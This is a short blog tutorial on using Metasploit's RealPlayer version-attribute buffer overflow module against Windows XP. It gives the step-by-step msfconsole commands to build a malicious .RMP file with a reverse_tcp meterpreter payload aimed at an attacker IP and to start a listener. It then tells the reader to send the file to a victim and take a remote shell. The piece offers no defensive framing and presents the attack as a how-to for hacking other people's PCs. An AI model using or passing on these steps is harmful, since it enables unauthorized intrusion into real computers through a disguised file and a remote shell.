Hack Remote PC Using Real Networks RealPlayer Version Attribute Buffer Overflow

This module exploits a stack-based buffer overflow vulnerability in version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by improper bounds checking of the version and encoding attributes inside the XML declaration. By persuading the victim to open a specially-crafted .RMP file, a remote attacker could execute arbitrary code on the system or cause the application to crash

Exploit Targets
Windows XP SP 3
Real Player 16.0.3.51
Real Player  16.0.2.32

Requirement
Attacker: Kali Linux
Victim PC: Windows XP

Open Kali Linux terminal type msfconsole


Now type use exploit/windows/fileformat/realplayer_ver_attribute_bof
msf exploit (realplayer_ver_attribute_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (realplayer_ver_attribute_bof)>set lhost 192.168.1.102 (IP of Local Host)
msf exploit (realplayer_ver_attribute_bof)>exploit


After we successfully generate the malicious rmp File, it will stored on your local computer
/root/.msf4/local/msf.rmp


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.102
exploit

Now send your msf.rmp files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


0 comments:

Post a Comment